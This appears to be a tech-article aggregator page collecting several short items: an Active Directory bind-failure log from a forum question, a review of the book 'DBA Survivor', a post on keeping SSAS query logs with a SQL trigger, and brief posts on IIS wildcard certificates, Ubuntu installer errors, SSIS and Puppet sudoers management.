14:19:13.238645 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - host completed: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00020001 2013-10-25 14:19:13.238674 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_sendto_context DOMAIN.COM done: 0 hosts 1 packets 1 wc: 0.001656 nr: 0.000000 kh: 0.000409 tid: 00020001 2013-10-25 14:19:13.238839 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - Trying to find service kdc for realm DOMAIN.COM flags 2 2013-10-25 14:19:13.239302 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - submissing new requests to new host 2013-10-25 14:19:13.239360 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to host: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00030001 2013-10-25 14:19:13.239429 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to 11: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00030001 2013-10-25 14:19:13.239683 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - writing packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00030001 2013-10-25 14:19:13.240350 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - reading packet: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00030001 2013-10-25 14:19:13.240387 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - host completed: tcp 192.168.0.1:kerberos (192.168.0.1) tid: 00030001 2013-10-25 14:19:13.240415 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_sendto_context DOMAIN.COM done: 0 hosts 1 packets 1 wc: 0.001578 nr: 0.000000 kh: 0.000445 tid: 00030001 2013-10-25 14:19:13.240514 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_credentials_with_flags: DOMAIN.COM wc: 0.003615 2013-10-25 14:19:13.240537 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - valid credentials for [email protected] 2013-10-25 14:19:13.240541 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - switching to cache 'MEMORY:0x7fa713635470' 2013-10-25 14:19:13.240545 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - switching GSS to cache 'MEMORY:0x7fa713635470 2013-10-25 14:19:13.240555 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Bind Step 5 - Bind/Join computer to domain - 'domain.com' 2013-10-25 14:19:13.241345 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - resolving 'server.domain.com' 2013-10-25 14:19:13.241646 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - added socket 12 for host 'server.domain.com:389' address '192.168.0.2' to kqueue list 2013-10-25 14:19:13.241930 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Setting kerberos server for 'Kerberos:DOMAIN.COM' to 'server.domain.com' 2013-10-25 14:19:13.241962 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - switching to cache 'MEMORY:0x7fa713635470' 2013-10-25 14:19:13.241969 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - switching GSS to cache 'MEMORY:0x7fa713635470 2013-10-25 14:19:13.242231 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI allow Confidentiality 2013-10-25 14:19:13.242234 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - setting realm 'DOMAIN.COM' for node '/Active Directory/domain.com' 2013-10-25 14:19:13.242239 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI allow Integrity (signing) 2013-10-25 14:19:13.242274 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI using hostname 'server.domain.com' 2013-10-25 14:19:13.242282 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI using initiator credential '[email protected]' 2013-10-25 14:19:13.250771 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Authenticate to LDAP using Kerberos credential - 0 2013-10-25 14:19:13.250784 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - verified connectivity to '192.168.0.2' with socket 12 2013-10-25 14:19:13.251513 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - locating site using domain domain.com using CLDAP 2013-10-25 14:19:13.252145 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - using site of 'DOMAINGROUP' from CLDAP 2013-10-25 14:19:13.253626 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - resolving 'server2.domain.com' 2013-10-25 14:19:13.253933 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - added socket 13 for host 'server2.domain.com:389' address '192.168.0.1' to kqueue list 2013-10-25 14:19:13.254428 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Setting kerberos server for 'Kerberos:DOMAIN.COM' to 'server2.domain.com' 2013-10-25 14:19:13.254462 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - switching to cache 'MEMORY:0x7fa713635470' 2013-10-25 14:19:13.254468 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - switching GSS to cache 'MEMORY:0x7fa713635470 2013-10-25 14:19:13.254617 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - setting realm 'DOMAIN.COM' for node '/Active Directory/domain.com' 2013-10-25 14:19:13.254661 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI allow Confidentiality 2013-10-25 14:19:13.254670 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI allow Integrity (signing) 2013-10-25 14:19:13.254689 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI using hostname 'server2.domain.com' 2013-10-25 14:19:13.254695 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - GSSAPI using initiator credential '[email protected]' 2013-10-25 14:19:13.262092 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Authenticate to LDAP using Kerberos credential - 0 2013-10-25 14:19:13.262108 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - verified connectivity to '192.168.0.1' with socket 13 2013-10-25 14:19:13.262982 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Computer account either already exists or DC is already Read/Write 2013-10-25 14:19:13.264968 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Adding record 'cn=spike,CN=Computers,DC=domain,DC=com' in 'domain.com' The failure point seems to be Computer account either already exists or DC is already Read/Write, however, I can search for 'spike' on the Active Directory server using Active Directory Explorer and it's not there. If I do the same search for the Linux and Windows PCs I added previously, I can find them.

    Read the article

  • SQLAuthority Book Review – DBA Survivor: Become a Rock Star DBA

    - by pinaldave
    DBA Survivor: Become a Rock Star DBA – Thomas LaRock Link to Amazon Link to Flipkart First of all, I thank all my readers when I wrote that I could not get this book in any local book stores, because they offered me to send a copy of this good book. A very special mention goes to Sripada and Jayesh for they gave so much effort in finding my home address and sending me the hard copy. Before, I did not have the copy of the book, but now I have two of it already! It surprises me how my readers were able to find my home address, which I have not publicly shared. Quick Review: This is indeed a one easy-to-read and fun book. We all work day and night with technology yet we should not forget to show our love and care for our family at home. For our souls that starve for peace and guidance, this one book is the “it” book for all the technology enthusiasts. Though this book was specifically written for DBAs, the reach is not limited to DBAs only because the lessons incorporated in it actually applies to all. This is one of the most motivating technical books I have read. Detailed Review: Let us go over a few questions first: Who wants to be as famous as rockstars in the field of Database Administration? How can one learn what it takes to become a top notch software developer? If you are a beginner in your field, how will you go to next level? Your boss may be very kind or like Dilbert’s Boss, what will you do? How do you keep growing when Eco-system around you does not support you? You are almost at top but there is someone else at the TOP, what do you do and how do you avoid office politics? As a database developer what should be your basic responsibility? and many more… I was able to completely read book in one sitting and I loved it. Before I continue with my opinion, I want to echo the opinion of Kevin Kline who has written the Forward of the book. He has truly suggested that “You hold in your hands a collection of insights and wisdom on the topic of database administration gained through many years of hard-won experience, long nights of study, and direct mentorship under some of the industry’s most talented database professionals and information technology (IT) experts.” Today, IT field is getting bigger and better, while talking about terabytes of the database becomes “more” normal every single day. The gods and demigods of database professionals are taking care of these large scale databases and are carefully maintaining them. In this world, there are only a few beginnings on the first step. There are many experts in different technology fields who are asked to address the issues with databases. There is YOU and ME, who is just new to this work. So we ask ourselves WHERE to begin and HOW to begin. We adore and follow the religion of our rockstars, but oftentimes we really have no idea about their background and their struggles. Every rockstar has his success story which needs to be digested before learning his tricks and tips. This book starts with the same note and teaches the two most important lessons for anybody who wants to be a DBA Rockstar –  to focus on their single goal of learning and to excel the technology. The story starts with three simple guidelines – Get Prepared, Get Trained, Get Certified. Once a person learns the skills, and then, it would be about time that he needs to enrich or to improve those skills you have learned. I am sure that the right opportunity will come finding themselves and they will not have to go run behind it. However, the real challenge for any person is the first day or first week. A new employee, no matter how much experienced he is, sometimes has no clue about what should one do at new job. Chapter 2 and chapter 3 precisely talk about what one should do as soon as the new job begins. It is also written with keeping the fact in focus that each job can be very much different but there are few infrastructure setups and programming concepts are the same. Learning basics of database was really interesting. I like to focus on the roots of any technology. It is important to understand the structure of the database before suggesting what indexes needs to be created, the same way this book covers the most essential knowledge one must learn by most database developers. I think the title of the fourth chapter is my favorite sentence in this book. I can see that I will be saying this again and again in the future – “A Development Server Is a Production Server to a Developer“. I have worked in the software industry for almost 8 years now and I have seen so many developers sitting on their chairs and waiting for instructions from their lead about how to improve the code or what to do the next. When I talk to them, I suggest that the experiment with their server and try various techniques. I think they all should understand that for them, a development server is their production server and needs to pay proper attention to the code from the beginning. There should be NO any inappropriate code from the beginning. One has to fully focus and give their best, if they are not sure they should ask but should do something and stay active. Chapter 5 and 6 talks about two essential skills for any developer and database administration – what are the ethics of developers when they are working with production server and how to support software which is running on the production server. I have met many people who know the theory by heart but when put in front of keyboard they do not know where to start. The first thing they do opening the browser and searching online, instead of opening SQL Server Management Studio. This can very well happen to anybody who is experienced as well. Chapter 5 and 6 addresses that situation as well includes the handy scripts which can solve almost all the basic trouble shooting issues. “Where’s the Buffet?” By far, this is the best chapter in this book. If you have ever met me, you would know that I love food. I think after reading this chapter, I felt Thomas has written this just keeping me in mind. I think there will be many other people who feel the same way, too. Even my wife who read this chapter thought this was specifically written for me. I will not talk any more about this chapter as this is one must read chapter. And of course this is about real ‘FOOD‘. I am an SQL Server Trainer and Consultant and I totally agree with the point made in the chapter 8 of this book. Yes, it says here that what is necessary to train employees and people. Millions of dollars worth the labor is continuously done in the world which has faults and incorrect. Once something goes wrong, very expensive consultant comes in and fixes the problem. This whole cycle which can be stopped and improved if proper training is done. There is plenty of free trainings available as well, if one cannot afford paid training. “Connect. Learn. Share” – I think this is a great summary and bird’s eye view of this book. Networking is the key. Everything which is discussed in this book can be taken to next level if one properly uses this tips and continuously grow with it. Connecting with others, helping learn each other and building the good knowledge sharing environment should be the goal of everyone. Before I end the review I want to share a real experience. I have personally met one DBA who has worked in a single department in a company for so long that when he was put in a different department in his company due to closing that department, he could not adjust and quit the job despite the same people and company around him. Adjusting in the new environment gets much tougher as one person gets more and more experienced. This book precisely addresses the same issue along with their solutions. I just cannot stop comparing the book with my personal journey. I found so many things which are coincidently in the book is written as how we developer and DBA think. I must express special thanks to Thomas for taking time in his personal life and write this book for us. This book is indeed a book for everybody who wants to grow healthy in the tough and competitive environment. Reference: Pinal Dave (http://blog.SQLAuthority.com) Filed under: Pinal Dave, SQL, SQL Authority, SQL Query, SQL Server, SQL Tips and Tricks, SQLAuthority Book Review, SQLAuthority News, SQLServer, T SQL, Technology

    Read the article

  • Query Logging in Analysis Services

    - by MikeD
    On a project I work on, we capture the queries that get executed on our Analysis Services instance (SQL Server 2008 R2) and use the table for helping us to build aggregations and also we aggregate the query log daily into a data warehouse of operational data so we can track usage of our Analysis databases by users over time. We've learned a couple of helpful things about this logging that I'd like to share here.First off, the query log table automatically gets cleaned out by SSAS under a few conditions - schema changes to the analysis database and even regular data and aggregation processing can delete rows in the table. We like to keep these logs longer than that, so we have a trigger on the table that copies all rows into another table with the same structure:Here is our trigger code:CREATE TRIGGER [dbo].[SaveQueryLog] on [dbo].[OlapQueryLog] AFTER INSERT AS       INSERT INTO dbo.[OlapQueryLog_History] (MSOLAP_Database, MSOLAP_ObjectPath, MSOLAP_User, Dataset, StartTime, Duration)      SELECT MSOLAP_Database, MSOLAP_ObjectPath, MSOLAP_User, Dataset, StartTime, Duration FROM inserted Second, the query logging process is "best effort" - if SSAS cannot connect to the database listed in the QueryLogConnectionString in the Analysis Server properties, it just stops logging - it doesn't generate any errors to the client at all, which is a good thing. Once it stops logging, it doesn't retry later - an hour, a day, a week, or even a month later, so long as the service doesn't restart.That has burned us a couple of times, when we have made changes to the service account that is used for SSAS, and that account doesn't have access to the database we want to log to. The last time this happened, we noticed a while later that no logging was taking place, and I determined that the service account didn't have sufficient permissions, so I made the necessary changes to give that service account access to the logging database. I first tried just the db_datawriter role and that wasn't enough, so I granted the service account membership in the db_owner role. Yes, that's a much bigger set of permissions, but I didn't want to search out the specific permissions at the time. Once I determined that the service account had the appropriate permissions, I wanted to get query logging restarted from SSAS, and I wondered how to do that? Having just used a larger hammer than necessary with the db_owner role membership, I considered just restarting SSAS to get it logging again. However, this was a production server, and it was in the middle of business hours, and there were active users connecting to that SSAS instance, so I thought better of it.As I considered the options, I remembered that the first time I set up query logging, by putting in a valid connection string to the QueryLogConnectionString server property, logging started immediately after I saved the properties. I wondered if I could make some other change to the connection string so that the query logging would start again without restarting the service. I went into the connection string dialog, went to the All page, and looked at the properties I could change that wouldn't affect the actual connection. Aha! The Application Name property would do just nicely - I set it to "SSAS Query Logging" (it was previously blank) and saved the changes to the server properties. And the query logging started up right away. If I need to get this running again in the future, I could just make a small change in the Application Name property again, save it, and even change it back again if I wanted to.The other nice side effect of setting the Application Name property is that now I can see (and possibly filter for or filter out) the SQL activity in that database that is related to the query logging process in Profiler:  To sum up:The SSAS Query Logging process will automatically delete rows from the QueryLog table, so if you want to keep them longer, put a trigger on the table to copy the rows to another tableThe SSAS service account requires more than db_datawriter role membership (and probably less than db_owner) in the database specified in the QueryLogConnectionString server property to successfully insert log rows to the QueryLog  table.Query logging will stop quietly whenever it encounters an error. Make a change to the QueryLogConnectionString server property (such as the Application Name attribute) to get query logging to restart and you won't have to restart the service.

    Read the article

  • Using Wildcard SSL Certificates on IIS 7

    - by The Official Microsoft IIS Site
    The other day I was helping someone who was trying to configure a wildcard certificate on their Windows Cloud Server . Their server was running Windows 2008 R2 server using IIS 7. The were technically savvy and knew how to configure site’s on their own and install a regular SSL certificate but they were stuck trying to get a wildcard certificate configured properly. They had quite a few site’s configured using subdomains such as support.domain.com, mail.domain.com, login.domain.com, etc. To tighten...(read more)

    Read the article

  • Cannot install any software from the Software Center due to ttf-mscorefonts-installer package error

    - by Dei
    When I try to install any software from ubuntu software center it comes with error: An unhandled error occured There seems to be a programming error in aptdaemon. This is the software that allows you to install/remove software and to perform other package management related tasks. details Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/aptdaemon/worker.py", line 961, in simulate trans.unauthenticated = self._simulate_helper(trans) File "/usr/lib/python2.7/dist-packages/aptdaemon/worker.py", line 1085, in _simulate_helper return depends, self._cache.required_download, \ File "/usr/lib/python2.7/dist-packages/apt/cache.py", line 226, in required_download pm.get_archives(fetcher, self._list, self._records) SystemError: E:I wasn't able to locate file for the ttf-mscorefonts-installer package. This might mean you need to manually fix this package. Please help me!

    Read the article

  • SSIS Prehistory video

    - by jamiet
    I’m currently wasting spending my Easter bank holiday putting together my presentation SSIS Dataflow Performance Tuning for the upcoming SQL Bits conference in London and in doing so I’m researching some old material about how the dataflow actually works. Boring as it is I’ve gotten easily sidelined and have chanced upon an old video on Channel 9 entitled Euan Garden - Tour of SQL Server Team (part I). Euan is a former member of the SQL Server team and in this series of videos he walks the halls of the SQL Server building on Microsoft’s Redmond campus talking to some of the various protagonists and in this one he happens upon the SQL Server Integration Services team. The video was shot in 2004 so this is a fascinating (to me anyway) glimpse into the development of SSIS from before it was ever shipped and if you’re a geek like me you’ll really enjoy this behind-the-scenes look into how and why the product was architected. The video is also notable for the presence of the cameraman – none other than the now-rather-more-famous-than-he-was-then Robert Scoble. See it at http://channel9.msdn.com/posts/TheChannel9Team/Euan-Garden-Tour-of-SQL-Server-Team-part-I/ Enjoy! @Jamiet Share this post: email it! | bookmark it! | digg it! | reddit! | kick it! | live it!

    Read the article

  • Clarity of the cloud with Microsoft Learning Experience.

    - by Testas
      while waiting for the Superbowl, I thought I would write this..... 2014 will not only see the release of a new version of SQL Server, but also accompanying this is the release of courses and certification tracks from Microsoft Learning Experience – formerly Microsoft Learning -- that will support the education of SQL Server and related technologies. The notable addition in the curriculum, is substantial material on cloud and big data features that pertain to data and business intelligence. There are entire module/chapters that are dedicated Power BI, SQL Azure and HDInsight. Certifications and courses from Microsoft can get stick – sometimes fair and sometimes unfairly. Whilst I am a massive advocate of community to get information and education. Microsoft’s new courses will bring clarity to the burning topics of the moment and help you to understand the capabilities of Power BI and HDInsight. From a business intelligence perspective there will be three courses: 20463C: Data warehousing in SQL Server 2014 20466C: data models and reports in SQL Server 2014 20467A: Designing Self-Service Business Intelligence and Big Data Solutions These are not the exact titles of the course, but will be confirmed prior to the release. And if you have already completed the SQL Server 2012 or 2008 curriculum, there is an upgrade course from 10977A: Upgrading business intelligence skills from 2008 to 2014. Again this is not the exact title, but these should give you an idea. Look out for announcements from Microsoft Learning Experience….   CHRIS

    Read the article

  • How to generate customized sudoers files in puppet depending on the environment they're deployed to?

    - by gozu
    the sysadmins are present in the sudoers files of all environments, but other sudoers are not. Different environments all have slightly different sudoers. Most of the time, 90% of users are the same, and 10% vary so we cannot have only one sudoers file for everything. Right now, we are using puppet with 10 different files with names like sudoers.production1, sudoers.production2, sudoers.production3, sudoers.testing1, sudoers.staging1 and so forth. Puppet then picks the file to deploy based on the server's $domain (ex: dbserver.staging1.acme.com) or $hardwaremodel. It works fine but it's a nightmare to maintain so many files. I'd like to autogenerate sudoers files based on the server's domain and have only one big file with all the sudoers permissions for all users and all environments. Something that looks like: User_Alias ADMINS = abe, bob, carol, dave case $domain { "staging1.acme.com" { #add dev1,dev2,tester1,tester2 to sudoers file } "testing2.acme.com" { #add tester1, tester3, tester4 to sudoers file } What's the best way to go about this? Suggestions for alternatives are welcome. I'd appreciate any tips. Update 1: For security reasons, we'd rather not concatenate a bunch of files from a folder located on a puppet client in case someone puts a file in there (maliciously or not) and either breaks the combined file or inserts something in it. Most importantly, for usability, we'd like to keep the number of sudoers related files (fragment or complete) on puppet server to either 3 (prod/stage/test) or preferably 1 file. this file would (somehow) generate sudoers files on the puppet server and send one customized file to each puppet client. The purpose of this would be only searching for a username in a single file and removing it quicker than doing it on 11 files. When adding a user to a bunch of environments, it won't be as quick, but only one file would need to be opened and looked at, greatly reducing the chances of an omission. our Sudo version is 1.6.9p8 so we can't use /sudoers.d folder, only a sudoers file.

    Read the article

  • SQLServerCentral Webinar Series #6: Gathering and Interpreting Server Metrics including SQL Monitor

    In this webinar, MVP and noted author, Grant Fritchey shows you how to better keep track of what is happening on your instances by gathering information on performance from SQL Monitor and then using that to interpret the impact on your databases. Dec 14, 2010. NEW! SQL Monitor 2.0Monitor SQL Server Central's servers withRed Gate's new SQL Monitor.No installation required. Find out more.

    Read the article

  • Failed to load viewstate.The control tree into which viewstate is being loaded...etc

    - by alaa9jo
    Two days ago,a colleague of mine tried to publish an asp.net website (which is built in VS2008 using framework 3.5) to our server,he configured everything in IIS (he made sure that the selected asp.net version is 2.0) and launched the website..at first it was working great but when he tried to click on a specific treeview...BOOM..: "Failed to load viewstate. The control tree into which viewstate is being loaded must match the control tree that was used to save viewstate during the previous request. For example, when adding controls dynamically, the controls added during a post-back must match the type and position of the controls added during the initial request." In that page there were these control: a TreeView and a Placeholder,when the user selects any node then it's controls will be created dynamically into that placeholder..for the first time it's working fine but when (s)he select another node then that issue appears. He called me to help him with this issue,for me this is the first time I see such an issue,scratch my head then I decided to eliminate the possibilities of this issue one by one,at the development machine it's working perfectly,he published the website at the local IIS and again..it's working perfectly,I took a copy of the website and published it into my laptop but no issues at all,so this is means that it's not an issue in the code. So there is something missing/wrong in our server [it has Windows Server 2003],we went to the server and checked on the web-config and the configurations on IIS...nothing wrong so far,so I decided to check if the framework 3.5 is installed or not and the answer: it wasn't installed Of course he assumed that it was installed and there was nothing to tell if it wasn't from the "ASP.Net version" in IIS because frameworks 3.0 and 3.5 will not be listed there [2.0 will be listed there instead],the only way to check if it was installed or not is to search for the framework in this path:[WINDOWS Folder]\Microsoft.NET\Framework or check if it was installed in Add or remove programs. The obvious solution for his case: We installed Framework 3.5 SP1 into our server,did a restart to the machine and it worked ! If anyone faced the same issue and solved it using the same solution or with a different one please post it here to share experience.

    Read the article

  • Implementing User-Defined Hierarchies in SQL Server Analysis Services

    To be able to drill into multidimensional cube data at several levels, you must implement all of the hierarchies on the database dimensions. Then you'll create the attribute relationships necessary to optimize performance. Analysis Services hierarchies offer plenty of possibilities for displaying the data that your business requires. Rob Sheldon continues his series on SQL Server Analysis Services 2008.

    Read the article

  • How many production servers should I start with?

    - by elfintar
    I'm building a site that I plan to grow to the size of SO. I'm only planning to have one prodcuction server to start off with. This will host everything including the database. I know it's very hard to say but am I likely to run into trouble quickly (if the site takes off) and if this is the case should I start out with more than one server so I can load balance everything from day 1? If no, should I be looking for something a little bigger than this spec?: http://www.123-reg.co.uk/dedicated-server-hosting/

    Read the article

< Previous Page | 419 420 421 422 423 424 425 426 427 428 429 430  | Next Page >